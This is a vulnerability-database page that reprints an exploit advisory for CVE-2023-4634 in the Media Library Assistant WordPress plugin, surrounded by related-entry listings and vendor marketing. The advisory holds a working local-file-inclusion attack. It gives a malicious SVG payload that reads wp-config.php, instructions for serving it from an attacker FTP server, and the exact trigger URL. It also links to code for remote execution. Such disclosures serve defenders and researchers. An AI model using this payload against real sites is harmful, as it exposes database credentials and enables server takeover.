Vulners
Lucene search
Media Library Assistant Wordpress Plugin - RCE and LFI
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | Exploit for CVE-2023-4634 | 4 Feb 202617:59 | – | githubexploit |
| Exploit for CVE-2023-4634 | 5 Sep 202307:44 | – | githubexploit |
 | Wordpress Media Library Assistant Plugin - Remote Code Execution / Local File Inclusion Exploit | 9 Oct 202300:00 | – | zdt |
 | CVE-2023-4634 | 5 Sep 202311:57 | – | circl |
 | WordPress plugin Media Library Assistant security vulnerability | 6 Sep 202300:00 | – | cnnvd |
 | CVE-2023-4634 | 6 Sep 202308:27 | – | cve |
 | CVE-2023-4634 Media Library Assistant <= 3.09 - Unauthenticated Local/Remote File Inclusion & Remote Code Execution | 6 Sep 202308:27 | – | cvelist |
 | Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion | 2 Jun 202610:14 | – | nuclei |
 | CVE-2023-4634 | 6 Sep 202309:15 | – | nvd |
 | CVE-2023-4634 | 6 Sep 202309:15 | – | osv |
10
# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI
# Date: 2023/09/05
# CVE: CVE-2023-4634
# Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh
# Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
# Exploit: https://github.com/Patrowl/CVE-2023-4634/
# Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/
# Software Link: https://fr.wordpress.org/plugins/media-library-assistant/
# Version: < 3.10
# Tested on: 3.09
# Description:
# Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php
#LFI
Steps to trigger conversion of a remote SVG
Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references)
Host 2 files :
- malicious.svg
- malicious.svg[1]
Payload:
For LFI, getting wp-config.php:
Both malicious.svg and malicious.svg[1] on the remote FTP:
<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:../../../../wp-config.php" width="500" height="500" />
</svg>
Then trigger conversion with:
http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1
# Directory listing or RCE:
To achieve Directory listing or even RCE, it is a little more complicated.
Use exploit available here:
https://github.com/Patrowl/CVE-2023-4634/
# Note
Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default wordpress configuration and installation (Wordpress has high chance to have the default Imagick configuration).Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Oct 2023 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 3.19.8
EPSS0.92062
SSVC